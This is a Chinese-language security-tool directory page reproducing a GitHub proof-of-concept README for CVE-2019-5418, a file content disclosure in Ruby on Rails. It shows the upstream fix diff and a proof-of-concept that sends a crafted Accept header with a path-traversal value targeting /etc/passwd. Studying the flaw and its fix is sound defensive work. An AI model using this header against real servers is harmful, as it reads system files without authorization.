Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2019-5418 — CVE-2019-5418 - Ruby on Rails 文件内容泄露 | Kitploit
工具/GitHubGitHub/mpgn/cve-2019-5418
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试学习与教育
GitHubmpgn/cve-2019-5418

CVE-2019-5418

CVE-2019-5418 - Ruby on Rails 文件内容泄露

查看仓库
2012247年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2019-5418 - Rails 中的文件内容泄露

编辑注:此 CVE 可能导致远程代码执行,更多信息:https://github.com/mpgn/Rails-doubletap-RCE

Action View 中存在一个可能的文件内容泄露漏洞。 特制的 Accept 头与对 render file: 的调用相结合, 可导致目标服务器上的任意文件被渲染, 从而泄露文件内容。

影响仅限于在未指定 accept 格式时渲染文件内容的 render 调用。 控制器中受影响的代码 大致如下:

由 GitHub 的 John Hawthorn 发现

image

技术分析:

  • https://chybeta.github.io/2019/03/16/Analysis-for%E3%80%90CVE-2019-5418%E3%80%91File-Content-Disclosure-on-Rails/

安全公告:

  • https://groups.google.com/forum/#!topic/rubyonrails-security/pFRKI96Sm8Q

已在 Action View 6.0.0.beta3、5.2.2.1、5.1.6.2、5.0.7.2、4.2.11.1 中修复

root@kitploit:~
From f4c70c2222180b8d9d924f00af0c7fd632e26715 Mon Sep 17 00:00:00 2001
From: John Hawthorn <[email protected]>
Date: Mon, 4 Mar 2019 18:24:51 -0800
Subject: [PATCH] Only accept formats from registered mime types

[CVE-2019-5418]
[CVE-2019-5419]
---
 .../lib/action_dispatch/http/mime_negotiation.rb   |  5 +++++
 actionpack/test/controller/mime/respond_to_test.rb | 10 ++++++----
 .../new_base/content_negotiation_test.rb           | 14 ++++++++++++--
 3 files changed, 23 insertions(+), 6 deletions(-)

diff --git a/actionpack/lib/action_dispatch/http/mime_negotiation.rb b/actionpack/lib/action_dispatch/http/mime_negotiation.rb
index 498b1e669576..4e81ba12a58b 100644
--- a/actionpack/lib/action_dispatch/http/mime_negotiation.rb
+++ b/actionpack/lib/action_dispatch/http/mime_negotiation.rb
@@ -79,6 +79,11 @@ def formats
           else
             [Mime[:html]]
           end
+
+          v = v.select do |format|
+            format.symbol || format.ref == "*/*"
+          end
+
           set_header k, v
         end
       end

概念验证

  1. 在 demo 文件夹中运行存在漏洞的应用程序:
root@kitploit:~
foo@bar:~$ cd demo/
foo@bar:~$ bundle install
[...]
foo@bar:~$ rails s                                                                                                                12:59:54
=> Booting Puma
=> Rails 5.2.1 application starting in development 
=> Run `rails server -h` for more startup options
Puma starting in single mode...
* Version 3.12.0 (ruby 2.5.1-p57), codename: Llamas in Pajamas
* Min threads: 5, max threads: 5
* Environment: development
* Listening on tcp://0.0.0.0:3000
Use Ctrl-C to stop
Started GET "/" for 127.0.0.1 at 2019-03-16 13:00:00 +0100
Processing by Rails::WelcomeController#index as HTML
  Rendering /var/lib/gems/2.5.0/gems/railties-5.2.1/lib/rails/templates/rails/welcome/index.html.erb
  Rendered /var/lib/gems/2.5.0/gems/railties-5.2.1/lib/rails/templates/rails/welcome/index.html.erb (1.4ms)
Completed 200 OK in 8ms (Views: 2.7ms | ActiveRecord: 0.0ms)


Started GET "/chybeta" for 127.0.0.1 at 2019-03-16 13:00:03 +0100
Processing by ChybetaController#index as HTML
  Rendering README.md within layouts/application
  Rendered README.md within layouts/application (0.2ms)
Completed 200 OK in 122ms (Views: 121.1ms | ActiveRecord: 0.0ms)
  1. 访问路由 /chybeta
  2. 使用 Burp 拦截请求,并将 Accept 头替换为 Accept: ../../../../../../../../../../etc/passwd{{

image

image

下载工具